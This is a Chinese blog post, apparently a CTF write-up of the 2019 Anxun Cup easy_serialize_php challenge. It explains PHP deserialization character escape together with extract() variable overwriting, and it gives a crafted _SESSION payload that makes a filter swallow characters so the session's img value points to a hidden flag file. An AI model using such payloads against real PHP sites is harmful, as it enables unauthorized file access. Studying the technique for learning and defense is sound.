反序列化字符逃逸漏洞之

参考:[安洵杯 2019]easy_serialize_php_甜筒化了 -的博客-CSDN博客_easy_serialize_php

知识点:

extract()变量覆盖

反序列化字符逃逸;

什么意思呢,就是说当进行反序列化数组的时候,只认前面一个括号里面的内容;例如;

<?php

  $b='a:1:{s:2:"ei";s:5:"fjksj";}';
  var_dump(unserialize($b)) ;
  $c='a:1:{s:2:"ei";s:5:"fjksj";}dfjhgksaasdhgerakdj';  //在后面添加了一些干扰字符
  var_dump(unserialize($c)) ;

结果:

结果是不变的;

那么如果当序列化后的字符串经过一些函数过滤掉一些字符会发生什么呢;因为序列化后的字符是按照要求严格执行的,什么意思,就是s:1:"a" ; 这个1指得是字符串长度,它会自动往后面截取;

所以通过这两个规则利用起来就可以构造我们想要的东西;

这就是反序列化字符逃逸;

和变量覆盖怎么用?

变量覆盖是直接将之前的值取代,这里就可以作为 键逃逸;没有变量覆盖就值逃逸;

至于构造过程参考上述 :

键逃逸:

_SESSION[flagphp]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

 这里构造出来的session字典值就只有一个,就是

flagphp->;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

然而当经过

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

之后增加了img->base64_encode('guest_img.png');

此时serialize($_SESSION)的值就是:

a:2:{s:7:"flagphp";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

但是经过

filter(serialize($_SESSION));

就会把第一个flagphp吃掉;

所以变为:
a:2:{s:7:"";s:48:";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}

 再经过反序列化之后最后的";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}就会被忽略掉;

这就改变了session的键值:
";s:48:  ——>a

img——>ZDBnM19mMWFnLnBocA==

直接改变img不就可以了嘛!!!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值